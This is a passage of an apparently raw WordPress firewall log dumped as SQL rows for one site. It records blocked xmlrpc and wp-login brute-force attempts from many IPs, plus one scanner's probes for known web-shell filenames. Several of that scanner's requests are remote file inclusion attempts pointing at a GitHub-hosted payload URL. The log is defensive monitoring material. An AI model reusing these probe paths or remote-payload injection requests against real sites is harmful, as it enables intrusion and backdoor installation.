(Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','BIOH7De01uKm2FCiXdyNEZGP',0,1664610619.3945,18551,'','POST',403,0,515,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZneHRg8iJO2mPF1Gk9bNCDLB',0,1664610828.2172,8874,'','POST',403,0,515,0,1,'',0),('72.167.225.151',1218961815,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Is74REifNpx5UDCLYkMrXQ9A',0,1664611010.9334,6125,'','POST',403,0,515,0,1,'',0),('35.198.25.12',600185100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pRgB9ixPADes8bvLqS2F4umG',0,1664611400.6399,20598,'','POST',403,0,515,0,1,'',0),('89.233.5.168',1508443560,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','4F72UrR3Kx6CQfkuvznlmdcD',0,1664612654.8232,1363,'','POST',403,0,600,0,1,'',0),('182.79.46.50',3058642482,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','85x7ijPgQf4hR3y2kz9rtuw6',0,1664612655.2139,1183,'','POST',403,0,600,0,1,'',0),('222.124.3.203',3732669387,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','LMENyTSx52bZc9KsIeofDiak',0,1664612656.5043,512,'','POST',403,0,600,0,1,'',0),('185.210.145.8',3117584648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','HsCUMRviEzjZ20TxOYIeK8lX',0,1664612660.6487,958,'','POST',403,0,600,0,1,'',0),('64.64.237.75',1077996875,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','AMRtn8yXrKENCkbg3UYWjxVB',0,1664612661.0015,809,'','POST',403,0,600,0,1,'',0),('193.105.234.82',3244943954,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','kvjCetuaMPw7EgU0YT1qrxil',0,1664612669.2696,490,'','POST',403,0,600,0,1,'',0),('217.21.74.40',3642051112,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','DYLZq3mcGhpC1B7OR4leTKvV',0,1664612674.6373,462,'','POST',403,0,600,0,1,'',0),('134.122.42.249',2256153337,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','Vl3DhsEqwH6Up95PBuonZOxY',0,1664612680.4944,483,'','POST',403,0,600,0,1,'',0),('23.97.183.204',392280012,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','cb0gRfHq62Da8TOCvjBuF5mM',0,1664612683.8775,544,'','POST',403,0,600,0,1,'',0),('35.193.197.89',599901529,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Fbk1u7nR8ZeaP2yt4gTAVism',0,1664612841.8699,18965,'','POST',403,0,515,0,1,'',0),('35.198.25.12',600185100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ENDMyChX9ViP8zjb0Sk4u3Lp',0,1664613233.7037,19084,'','POST',403,0,515,0,1,'',0),('101.99.90.175',1701010095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TrC9etb64FsMEunq7U1ihO2Z',0,1664613427.1353,19982,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\\/5.0)\"}','hwqgZsGHM58NROPdYpVJ2zIv',0,1664613527.6047,1229,'','POST',403,0,600,0,1,'',0),('128.199.68.99',2160542819,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xb2CzmKSGIBtg03M5WoDTQ7Y',0,1664613651.9416,18154,'','POST',403,0,515,0,1,'',0),('159.89.170.41',2673453609,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','s5xV1pY0rKBGe9UXWZg4SvIo',0,1664613850.6423,1321,'','POST',403,0,515,0,1,'',0),('209.141.56.13',3515693069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','FEXpRaYuDj0bdPwJWMzrH2mo',0,1664614032.3167,1219,'','POST',403,0,600,0,1,'',0),('192.99.34.140',3227722380,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LG95Z0NWTcaQf6u3EBAHC8sg',0,1664614086.9134,1219,'','POST',403,0,515,0,1,'',0),('104.244.77.192',1760841152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','TtXesxR3iFC9vcEbYUBfMSKj',0,1664614224.2648,2189,'','POST',403,0,600,0,1,'',0),('3.131.4.125',58918013,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','U8fICEMGkbRAQTtjO1Lh6Pyu',0,1664614505.6322,18328,'','POST',403,0,515,0,1,'',0),('95.111.225.89',1601167705,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Zoj8B4TDpE6mFQVauJn9Nryc',0,1664614695.7290,1343,'','POST',403,0,515,0,1,'',0),('34.64.218.102',574675558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZrMb4WRn8fil2X36HVm0wjJ7',0,1664617257.6963,1301,'','POST',403,0,515,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4ODVSIfHZzMQTb7RqujLcC9K',0,1664617528.3218,1988,'','POST',403,0,515,0,1,'',0),('128.199.109.135',2160553351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qZmciYwB20Kv5f8EADQhxyWN',0,1664617697.5834,2248,'','POST',403,0,515,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ihlPxjnqy6WpQUVNgF3dzH4S',0,1664618147.8362,19154,'','POST',403,0,515,0,1,'',0),('193.107.158.16',3245055504,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','i9QMr84l6SyYbIChjetf1KNF',0,1664618378.4191,1205,'','POST',403,0,515,0,1,'',0),('213.165.237.48',3584421168,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lXUW3SwiqQIkvTfJVuHb9xsp',0,1664620377.1783,18936,'','POST',403,0,515,0,1,'',0),('87.236.20.180',1475089588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','i0PrnVsQxWcR4lzJBAt3EuTN',0,1664620624.9728,2239,'','POST',403,0,515,0,1,'',0),('74.208.103.228',1255172068,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','O8xF9vlIBMgqPVcCJtdKyaAU',0,1664620802.9543,20227,'','POST',403,0,515,0,1,'',0),('31.210.66.35',533873187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Kao3qRzftLrPb5iJTQE69MNS',0,1664621266.7163,18188,'','POST',403,0,515,0,1,'',0),('45.125.239.179',763228083,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QXUHdDLCgkPce02b1o4TtKu3',0,1664621502.3740,11407,'','POST',403,0,515,0,1,'',0),('184.154.69.85',3097118037,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UsEdj4XxFvaKeCoh0TVm2rHD',0,1664621711.9772,11425,'','POST',403,0,515,0,1,'',0),('103.74.120.192',1732933824,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dBlAs51ubiqxhgeDPyCTLwnZ',0,1664621965.8645,7919,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vTFrxiGIcgP2hXALqNZEz71d',0,1664628062.2447,18847,'','POST',403,0,515,0,1,'',0),('37.187.24.159',633018527,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9jgcwCmk7xIdtHe3fyNFR6Sp',0,1664628333.5518,1910,'','POST',403,0,515,0,1,'',0),('128.199.205.115',2160577907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qr4B5THIwDs23p9VzgbGCdXA',0,1664628524.4572,1481,'','POST',403,0,515,0,1,'',0),('54.38.44.6',908471302,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RmaJnuhvILP2O3ok9qS4dzGx',0,1664628807.2333,19218,'','POST',403,0,515,0,1,'',0),('103.116.16.173',1735659693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7XiqyDAzUZv9x3mbLIWakCJs',0,1664629006.2687,1164,'','POST',403,0,515,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php','','{\"1\":\"ALittle Client\"}','LIvUuS9e7wfdoO8YNkVDC06W',0,1664629235.5021,498,'','GET',403,0,700,0,1,'',0),('91.224.23.225',1541412833,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fVGkz2OKgDLQSdZ9XjC6F70Y',0,1664630982.1059,6802,'','POST',403,0,515,0,1,'',0),('185.225.33.99',3118539107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hgWudtFHxrjs2187vynJX0eO',0,1664631238.0225,1270,'','POST',403,0,515,0,1,'',0),('180.149.241.246',3029725686,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nCNjrvsIxFw94fmckdlOJHKP',0,1664631454.4715,1744,'','POST',403,0,515,0,1,'',0),('107.180.103.185',1806985145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jwOfldaHXIcxRtTeYG9Es2UA',0,1664631722.5919,2517,'','POST',403,0,515,0,1,'',0),('165.232.183.66',2783491906,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','l7nephz9wd2CIaWXDGtJQNLO',0,1664632186.8683,14064,'','POST',403,0,515,0,1,'',0),('62.210.181.102',1053996390,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JVmoI1TADSNHCFi7krRqvhYs',0,1664632399.5201,2097,'','POST',403,0,515,0,1,'',0),('95.111.225.89',1601167705,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cfox91t8ymYbnCwlhXdujTz0',0,1664632688.0860,2351,'','POST',403,0,515,0,1,'',0),('190.171.170.94',3198921310,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ErDxKgad34WOX7cpLlUujRQz',0,1664635154.7892,18455,'','POST',403,0,515,0,1,'',0),('51.75.146.208',860590800,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','G17kiKbhOaXsV3dSHqx8fWNL',0,1664635391.5443,19118,'','POST',403,0,515,0,1,'',0),('185.197.195.173',3116745645,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6xnQPpd3M4TCLqo9hG8Xa2U5',0,1664635677.9103,19689,'','POST',403,0,515,0,1,'',0),('111.90.150.171',1868207787,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','r4qSBGnikz9ox6lWUg3jT5tp',0,1664635885.1013,19899,'','POST',403,0,515,0,1,'',0),('192.163.194.31',3231957535,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','i2kuRBFmXWHGn9aOrMYSLEDq',0,1664638374.9339,1230,'','POST',403,0,515,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LdWDqj3Cywpa4Zx5RTnPEISG',0,1664638864.4133,18522,'','POST',403,0,515,0,1,'',0),('5.101.156.219',90545371,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yuTBjRQrnM9NpXaCoWk2b37I',0,1664639164.8987,8506,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','i1s2vUKT6Wd9RAaOmeh34nkQ',0,1664639267.4317,1259,'','POST',403,0,600,0,1,'',0),('123.31.41.38',2065639718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UbOz1dC59Ywpr6aIMuQlfLyD',0,1664639356.4431,5092,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','c4xGVD1CoQRqdfNyYnw0ikj7',0,1664639654.0243,5232,'','POST',403,0,515,0,1,'',0),('195.93.152.83',3277690963,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','frpHvSVejl1y972EGMIK6FXW',0,1664639890.4563,4683,'','POST',403,0,515,0,1,'',0),('192.163.195.60',3231957820,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YWdrKCAw8f5xmGkuPqzTXLoM',0,1664641152.1292,1295,'','POST',403,0,515,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3yXrxf2cWqTLB9NM4ouRj7pZ',0,1664641379.5945,19243,'','POST',403,0,515,0,1,'',0),('87.106.229.31',1466623263,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4MrAZqho7eRCzFnSdPkDjiYl',0,1664641645.9355,535,'','POST',403,0,515,0,1,'',0),('95.173.161.171',1605214635,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PqyinTLfSWaJ2NzGHt3rjmeE',0,1664641877.7069,2523,'','POST',403,0,515,0,1,'',0),('123.31.21.26',2065634586,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iQoKlDC07Sn4c9qUe8hvsuZT',0,1664642132.8068,1575,'','POST',403,0,515,0,1,'',0),('103.90.235.70',1734011718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Rp95twyP7qkBHNYguvsxMSlK',0,1664642627.3635,2576,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.114 Safari\\/537.36\"}','a1P5jFfWgEeTlLJhGwbVHmpQ',0,1664642674.2001,451,'','POST',403,0,600,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CKeMSyuYBc42amoWrfiHIU1k',0,1664642771.1430,288,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','HxS51LgBwurnVNWQEhcU0fsG',0,1664642773.7375,276,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tZOSDP0nwCQcFgfoXlzVeG4m',0,1664642777.2573,291,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Kjivh52G0gE9qSNuHOtreTm8',0,1664642780.6606,300,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','HF4B12gLi3xRIfNqeDmK7hCd',0,1664642829.3157,279,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','E0GLwbAvMUqZ69VXtxuFRKyi',0,1664642832.8146,503,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ldJrhxtYNs7vAC3jLDgb1RFK',0,1664642837.7402,906,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','muSyBYTkP0ibIoxjdeh35XOz',0,1664642843.3973,396,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1ONY8nIDf3ZpKJcokdCQS9yX',0,1664642846.1117,272,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FEZ6zrJlO7VnUSDaL2cjIBKy',0,1664642853.7007,307,'','GET',403,0,700,0,1,'',0),('47.106.201.134',795527558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iYqZy4px0VQRESBt6jc1XozL',0,1664642854.9060,611,'','POST',403,0,515,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yDSUbA1jKWtpln0z5ZRi4PgL',0,1664642855.6031,286,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sAqYlMoN5vuzCihIfbVdD7Rt',0,1664642857.3608,293,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jMWsh48iO9yTtq76CH1Qn5cv',0,1664642863.8503,277,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9R8xrkoQzSMGZNPBvdfDJO2K',0,1664642866.4369,384,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','NAexrZsTRtv3cSbwykFB4YJm',0,1664642869.4769,290,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YzkMQsjF5wtq6roNb3GmauB0',0,1664642872.4343,304,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','EgdKWQHGIL4lTre8aNPUOXw9',0,1664642874.9459,295,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 